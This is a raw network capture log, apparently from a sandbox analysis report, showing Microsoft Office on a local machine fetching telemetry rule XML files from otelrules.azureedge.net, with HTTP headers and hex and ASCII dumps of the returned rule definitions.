                                                                        2024-12-03 16:51:03 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        104192.168.2.44986313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:03 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:03 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:03 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1356
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                        ETag: "0x8DC582BDF66E42D"
                                                                        x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165103Z-174f7845968glpgnhC1EWR7uec00000016d0000000008asv
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:03 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        105192.168.2.44986413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:04 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:05 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:05 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1395
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                        ETag: "0x8DC582BE017CAD3"
                                                                        x-ms-request-id: 2eabf22f-f01e-005d-68dc-4313ba000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165105Z-174f7845968swgbqhC1EWRmnb400000016ag00000000hd60
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:05 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        106192.168.2.44986513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:05 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:05 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:05 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1358
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                        ETag: "0x8DC582BE6431446"
                                                                        x-ms-request-id: ebed6b5e-401e-0015-4f72-400e8d000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165105Z-174f7845968xr5c2hC1EWRd0hn0000000r50000000001q45
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:05 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        107192.168.2.44986613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:05 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:05 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:05 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1395
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                        ETag: "0x8DC582BDE12A98D"
                                                                        x-ms-request-id: e61fb942-301e-000c-78b4-43323f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165105Z-174f7845968cpnpfhC1EWR3afc00000015vg00000000adsg
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:05 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        108192.168.2.44986713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:05 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:05 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:05 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1358
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                        ETag: "0x8DC582BE022ECC5"
                                                                        x-ms-request-id: 12481441-f01e-001f-6fb2-425dc8000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165105Z-174f7845968px8v7hC1EWR08ng00000016k0000000000xrh
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:05 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        109192.168.2.44986813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:05 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:06 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:05 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1389
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                        x-ms-request-id: 179ef32c-501e-0016-1fc5-43181b000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165105Z-174f7845968xr5c2hC1EWRd0hn0000000r50000000001q5s
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:06 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        110192.168.2.44986913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:07 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:07 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:07 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1352
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                        x-ms-request-id: 0e5d9e53-c01e-0066-77ee-44a1ec000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165107Z-174f7845968frfdmhC1EWRxxbw000000164000000000w0f8
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:07 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        111192.168.2.44987013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:07 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:07 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:07 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1405
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                        ETag: "0x8DC582BE12B5C71"
                                                                        x-ms-request-id: 23749888-001e-0082-48f2-445880000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165107Z-174f7845968cs2nkhC1EWR2tq000000001xg0000000094hd
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:07 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        112192.168.2.44987213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:07 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:07 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:07 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1401
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                        ETag: "0x8DC582BE055B528"
                                                                        x-ms-request-id: 433964be-b01e-0001-5ce6-4446e2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165107Z-174f7845968n2hr8hC1EWR9cag00000015u000000000kdbc
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:07 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        113192.168.2.44987113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:07 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:07 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:07 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1368
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                        ETag: "0x8DC582BDDC22447"
                                                                        x-ms-request-id: fe90239e-101e-0017-14ee-4447c7000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165107Z-174f784596886s2bhC1EWR743w000000167000000000hbbf
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:07 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        114192.168.2.44987313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:07 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:08 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:07 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1364
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
